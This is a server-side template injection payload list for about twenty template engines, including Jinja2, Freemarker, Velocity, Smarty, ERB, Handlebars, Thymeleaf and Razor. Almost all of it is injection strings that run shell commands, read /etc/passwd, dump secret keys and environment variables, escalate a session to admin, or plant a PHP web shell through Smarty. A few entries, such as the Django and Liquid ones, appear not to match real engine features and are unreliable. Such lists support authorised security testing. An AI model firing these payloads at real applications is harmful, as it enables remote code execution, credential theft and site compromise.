# Server-Side Template Injection (SSTI) Payloads
# Test for various template engines

# Detection Payloads
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}

# Jinja2 (Python)
{{config}}
{{config.items()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
{{lipsum.__globals__['os'].popen('ls').read()}}
{{cycler.__init__.__globals__.os.popen('cat /etc/passwd').read()}}

# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.enableDebug()}}{{_self.env.isDebug()}}
{{7*'7'}}
{{"#{1+1}"}}

# Freemarker (Java)
${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
<#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex("java.lang.ProcessBuilder",["whoami"]).start()}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ex('id')}

# Velocity (Java)
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

# Smarty (PHP)
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{system('cat /etc/passwd')}
{$smarty.template}

# Mako (Python)
<%import os%>${os.system('id')}
${self.module.cache.util.os.system("id")}
<%import os%>${os.popen("whoami").read()}

# ERB (Ruby)
<%= 7*7 %>
<%= system("whoami") %>
<%= Dir.entries('/') %>
<%= File.open('/etc/passwd').read %>
<%= IO.popen('id').readlines() %>
<%= `ls /` %>
<%= File.read('/etc/passwd') %>

# Tornado (Python)
{{handler.settings}}
{%import os%}{{os.system('whoami')}}
{%import subprocess%}{{subprocess.check_output('id',shell=True)}}

# Django (Python)
{{request}}
{{settings.SECRET_KEY}}
{% debug %}
{% load module %}{% import_module os %}{{os.system('id')}}

# Handlebars (Node.js)
{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').exec('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

# Pug/Jade (Node.js)
#{7*7}
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('whoami')}()}
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}

# Nunjucks (Node.js)
{{range.constructor("return global.process.mainModule.require('child_process').execSync('whoami')")()}}
{{range.constructor("return global.process.env")()}}

# Thymeleaf (Java)
${T(java.lang.Runtime).getRuntime().exec('calc')}
${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}

# Expression Language (Java)
${pageContext.request.getSession().setAttribute("admin",true)}
${applicationScope}
${''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('whoami')}

# AngularJS
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}

# Vue.js
{{constructor.constructor('alert(1)')()}}
{{_c.constructor('alert(1)')()}}

# Razor (C#)
@(7*7)
@{System.Diagnostics.Process.Start("calc.exe");}
@{var proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = "/c whoami"; proc.Start();}

# Blade (PHP/Laravel)
@php(system('whoami'))
@php(phpinfo())
{{exec('whoami')}}

# Liquid (Ruby)
{{7*7}}
{{'cat /etc/passwd'|system}}

# Groovy
${9*9}
${new ProcessBuilder('whoami').start().text}
${new File('/etc/passwd').text}

# Polyglot Payloads (Multiple Engines)
${{7*7}}
${7*7}{{7*7}}
<%= 7*7 %>${7*7}{{7*7}}